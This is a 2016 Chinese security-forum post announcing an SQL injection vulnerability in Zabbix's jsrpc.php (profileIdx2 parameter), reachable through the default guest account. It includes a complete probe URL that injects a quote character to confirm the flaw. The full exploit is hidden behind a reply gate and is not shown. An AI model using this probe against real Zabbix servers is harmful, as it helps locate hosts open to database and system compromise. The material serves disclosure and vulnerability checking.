请选择 进入手机版 | 继续访问电脑版
设为首页 收藏本站 关于本站
开启辅助访问 切换风格
 找回密码
 加入我们

QQ登录

只需一步,快速开始

Zabbix高危SQL注入漏洞,可获取系统权限

3 209
admin 发表于 2016-8-18 15:34:54 |阅读模式
|复制链接

zabbix是一个开源的企业级性能监控解决方案。

官方网站http://www.zabbix.com

影响程度

攻击成本:低

危害程度:高

是否登陆:不需要(guest权限下)

影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)

zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,原文说是:“攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

测试发现注入的前提是需要登陆的。 不需要登陆是因为 zabbix 开启了guest权限,才可注入;而guest账号默认密码是空


在您的zabbix的地址后面加上如下url:
/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
输出结果,说明该漏洞存在
You have an error in your SQL syntax"

EXP回复吧
游客,如果您要查看本帖隐藏内容请回复

admin说:
回复

使用道具 举报

发表于 2016-8-18 17:39:44
支持一下啦
wahahaha说:
回复 支持 反对

使用道具 举报

发表于 2016-8-22 10:06:10
支持一下快快快快
anno1119说:
来自安卓客户端来自安卓客户端
回复 支持 反对

使用道具 举报

发表于 2016-10-15 08:59:49
啊啊啊啊啊
Admin魔帝说:
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 加入我们

本版积分规则

漏洞发布

关注:2

所属分类: 网络安全 漏洞发布

1、本版块发布Exploit情况,但不提供具体讨论,如果有讨论请到相关板块。
2、本版块不得上传任何附件(无论图片、压缩包还是其他类型),任何附件均以外链形式贴出。
3、不得发布不良信息、言论;不得宣扬暴力、色情内容,更不得借本版发布病毒、挂马等信息;文章注明出处、来源及作者。
4、不得唆教他人进行入侵、黑客等行为。
5、若帖中提供测试代码,不得将测试代码用于非法用途,否则后果自负!为方便阅读,所有代码均使用code格式发布。发布方法为:在文本编辑框选择“插入代码”。
6、发帖格式如下:漏洞公布人(组织)、公布时间、影响版本、是否修复漏洞(若已经修复漏洞须提供补丁地址)
发新帖
关闭

站长推荐 上一条 /1 下一条

快速回复 返回顶部 返回列表